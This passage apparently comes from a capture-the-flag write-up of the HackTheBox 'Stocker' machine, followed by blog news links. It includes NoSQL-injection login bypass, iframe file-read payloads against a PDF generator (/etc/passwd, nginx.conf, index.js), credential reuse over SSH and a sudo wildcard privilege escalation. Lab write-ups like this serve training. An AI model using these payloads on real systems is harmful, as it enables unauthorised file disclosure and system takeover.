I make some first attempts, but it doesn’t seem to be vulnerable to standard SLQi (SQL injection) attacks, even sqlmap doesn’t find anything. In addition to the technologies already mentioned, there is also the HUGO framework. I investigate.
This is a framework for creating portals, but it doesn’t seem to help me. Let’s keep that in mind, we’ll come back to it later if necessary. Let’s do another session with the dirb on this second domain as well.
Again nothing, I have to bypass the login first. Let’s go over what we did a bit and understand. Reviewing the past steps, it occurs to me that it is probably not an SQLi attack that is needed, but NOSQLi. And here I have to admit that I had some difficulty, not in the search for the vulnerability, but in the use of the tools, where once again, the fact was revealed that doing it manually brings its benefits, but let’s proceed step by step and so here are my stubborn mistakes in the desire to use existing tools (because I am convinced that they work better than I can do), to find than the right path in that manual activity which has always paid off.
Despite everything, nothing emerges for the two most popular NOSQL databases; mongodb and couchdb. Let’s go ahead, let’s rely on the best-stocked portal of tricks we know at the moment…
Again, however, they don’t seem to work for me. I decide on a few manual steps, so the BurpSuite is a must.
Here’s the call to login, still referring to the hacktricks guidelines, I start going through all the listed payloads and finally find the right one.
And finally, we are in. Now I can buy and request a receipt. The invoice is returned in pdf format, there must be a conversion process. Need to understand which tools are being used to make the conversion. so let’s download the pdf and take a closer look at the metadata.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.196 - Stocker (lin)/attack/dwnl]
└─$ exiftool 63f7d52e1c39f5e32db2f22c.pdf
ExifTool Version Number : 12.55
File Name : 63f7d52e1c39f5e32db2f22c.pdf
Directory : .
File Size : 38 kB
File Modification Date/Time : 2023:02:23 16:07:11-05:00
File Access Date/Time : 2023:02:23 16:08:04-05:00
File Inode Change Date/Time : 2023:02:23 16:08:04-05:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 1
Tagged PDF : Yes
Creator : Chromium
Producer : Skia/PDF m108
Create Date : 2023:02:23 21:06:00+00:00
Modify Date : 2023:02:23 21:06:00+00:00
The producer field provides us with the necessary information, so I search for “skia/pdf exploit” and immediately a series of interesting links are revealed to my eyes.
Ok, the portal cart seems to have remained full, it is not emptied after the purchase, which could make my life easier. Let’s see if I can modify the data inside it in a simple and fast way.
The products are placed in a javascript array named basket. Just change the information contained therein and make a new purchase. Let’s start by passing the most classic payload, just to understand if the vulnerability actually exists: <iframe src=file:////etc/passwd>.
When you open the cart again, the set payload appears.
And when we go to download the invoice, the magic happens.
To view it better, expand the context of the iframe, but don’t go beyond 1000 pixels for the height, the conversion seems to fail: <iframe width=’1200′ height=’700′ src=file:////etc/passwd>.
Do you remember the name of the Head of IT? Ok, needless to say, I immediately tried to reach the user flag file (<iframe width=’1200′ height=’700′ src=file:////home/angoose/user.txt>), but obviously to no avail. At this point the only thing I can do is go look for interesting files such as configuration files, DB connection, credentials, etc… Let’s focus on the technologies that we had identified with the wappalyzer.
Trying with <iframe width=’1200′ height=’1000′ src=file:////etc/nginx/nginx.conf>:
I’d like to see a few more lines of the file, but I think this could be a good starting point; the path in which the portal is published. Let’s cross this information with the fact that the back-end is in node.js and we can try to retrieve the most common filenames used for a project like this: app.js, server.js and index.js.
Even these little things sometimes make an attack simple for the hacker, always change settings like these, just to make the attack of a hypothetical hacker a little more complicated.
And using <iframe width=’1200′ height=’1000′ src=file:////var/www/dev/index.js>:
In addition to the mongodb address, in which the application user’s credentials are evident, I have also reported the block of code used to login, in which the point where we attacked via the NOSQLi payload is visible. It’s evident that there is not a dev user who has access via shell, but knowing the nature of the BOX, we can easily apply the password to the one that can use a shell from the list of users (/etc/passwd) obviously excluding the user of root.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/_10.10.11.196 - Stocker (lin)]
└─$ ssh angoose@10.10.11.196
The authenticity of host '10.10.11.196 (10.10.11.196)' can't be established.
ED25519 key fingerprint is SHA256:jqYjSiavS/WjCMCrDzjEo7AcpCFS07X3OLtbGHo/7LQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password:
Last login: Sun Feb 26 08:00:16 2023 from 10.10.14.45
-bash-5.0$ whoami
angoose
-bash-5.0$ pwd
/home/angoose
-bash-5.0$ ls -la
total 76
drwxr-xr-x 7 angoose angoose 4096 Feb 26 08:05 .
drwxr-xr-x 3 root root 4096 Dec 23 16:39 ..
drwxrwxr-x 2 angoose angoose 4096 Feb 26 04:18 aaaa
lrwxrwxrwx 1 root root 9 Dec 6 09:54 .bash_history -> /dev/null
-rw-r--r-- 1 angoose angoose 220 Dec 6 09:53 .bash_logout
-rw-r--r-- 1 angoose angoose 3771 Dec 6 09:53 .bashrc
drwx------ 2 angoose angoose 4096 Feb 26 02:06 .cache
-rw-rw-r-- 1 angoose angoose 86 Feb 26 04:32 exploit.js
-rw-rw-r-- 1 angoose angoose 205 Feb 26 04:32 exploit.js.bak
-rwxr-xr-x 1 angoose angoose 3123 Feb 26 04:10 index.js
drwxrwxr-x 3 angoose angoose 4096 Feb 26 02:11 .local
lrwxrwxrwx 1 angoose angoose 32 Feb 26 04:09 node_modules -> /usr/local/scripts/node_modules/
drwxrwxr-x 3 angoose angoose 4096 Feb 26 04:18 .npm
-rw-r--r-- 1 angoose angoose 807 Dec 6 09:53 .profile
-rwxr-xr-x 1 angoose angoose 623 Feb 26 04:10 schema.js
-rwxr-xr-x 1 angoose angoose 367 Feb 26 04:11 script.js
drwxrwxr-x 2 angoose angoose 4096 Feb 26 05:35 temp
-rw-r----- 1 root angoose 33 Feb 25 21:21 user.txt
-rw------- 1 angoose angoose 9506 Feb 26 08:05 .viminfo
-bash-5.0$ cat user.txt
7******************************7
-bash-5.0$
And first flag was captured, next step is really very fast, not even an advanced scan was needed. Let’s look at what this user can do as root without a password.
-bash-5.0$ sudo -l
[sudo] password for angoose:
Matching Defaults entries for angoose on stocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User angoose may run the following commands on stocker:
(ALL) /usr/bin/node /usr/local/scripts/*.js
Apparently, we can run node scripts contained in a particular folder. That asterisk, however, highlights an unequivocal traversal path. So I prepare my malicious script. I initially tried to spawn a shell as root, but quickly reverted (child_process didn’t seem to work), so I chose a script that simply reads the root flag file.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-16 22:07:312025-03-16 22:07:31Start-up Security 101: How to Protect Your Venture from Cybersecurity Risk
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-16 21:07:022025-03-16 21:07:02Intel’s Secure Data Tunnel Moves AI Training Models to Data Sources
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-16 11:07:542025-03-16 11:07:54LockBit Developer Rostislav Panev Extradited from Israel to the US
Plus: A nominee to lead CISA emerges, Elon Musk visits the NSA, a renowned crypto cracking firm’s secret (and problematic) cofounder is revealed, and more.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-15 18:07:042025-03-15 18:07:04End-to-End Encrypted Texts Between Android and iPhone Are Coming
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-03-15 15:07:062025-03-15 15:07:06Cybersecurity in Crypto: Best Practices to Prevent Theft and Fraud
Cybersecurity researchers have warned of a malicious campaign targeting users of the Python Package Index (PyPI) repository with bogus libraries masquerading as “time” related utilities, but harboring hidden functionality to steal sensitive data such as cloud access tokens.
Software supply chain security firm ReversingLabs said it discovered two sets of packages totaling 20 of them. The packages
